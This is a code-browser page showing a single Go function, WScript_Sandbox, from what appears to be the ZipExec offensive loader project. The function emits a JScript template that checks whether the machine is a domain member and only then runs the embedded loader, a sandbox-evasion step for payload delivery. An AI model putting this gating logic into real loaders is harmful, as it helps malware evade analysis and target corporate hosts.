MCPcopy Create free account
hub / github.com/Tylous/ZipExec / WScript_Sandbox

Function WScript_Sandbox

Loader/Loader.go:204–214  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

202}
203
204func WScript_Sandbox() string {
205 return `
206 var {{.Variables.objShell}} = new ActiveXObject("Shell.Application")
207 var {{.Variables.domain}} = {{.Variables.objShell}}.GetSystemInformation("IsOS_DomainMember");
208 if ({{.Variables.domain}} == 0 ){
209 }
210 else {
211 {{.Variables.loader}}
212 }
213`
214}

Callers 1

JScriptLoader_BuffFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected